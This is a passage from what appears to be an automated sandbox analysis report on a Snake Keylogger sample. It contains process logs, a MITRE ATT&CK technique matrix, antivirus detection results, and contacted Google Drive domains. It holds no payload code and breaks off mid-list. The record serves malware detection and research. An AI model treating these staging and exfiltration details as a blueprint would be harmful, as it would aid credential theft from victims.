      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts311
      Process Injection      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      TVPfW4WUdj.exe71%VirustotalBrowse
      TVPfW4WUdj.exe55%ReversingLabsWin32.Spyware.Snakekeylogger

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe55%ReversingLabsWin32.Spyware.Snakekeylogger

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://crl.microi0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		216.58.206.46
      		truefalse
        		high
        drive.usercontent.google.com
        		172.217.16.193
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://drive.usercontent.google.com/)msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/;msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188921511.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847006851.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847090543.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858746029.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2166712007.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1836022196.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858789773.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1835971025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177475867.000000000632B000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2428136172.000000000636B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.microHpowershell.exe, 00000002.00000002.1776191402.0000000007720000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/3msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109648798.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2098270407.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109737364.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2098333838.000000000632C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990751609.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199945524.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.google.com/Kmsiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211417198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2027022513.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2234687967.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060355604.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049462072.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049529809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2245474853.000000000632B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorTVPfW4WUdj.exe, TVPfW4WUdj.exe.2.drfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.commsiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.microipowershell.exe, 00000002.00000002.1769645096.0000000003404000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1770102180.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.com/msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2143694865.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109648798.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211417198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2027022513.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268082397.000000000632B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.google.com/Smsiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2143694865.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2166712007.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060355604.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049462072.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177475867.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049529809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132210940.000000000632C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://apis.google.commsiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2507565714.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 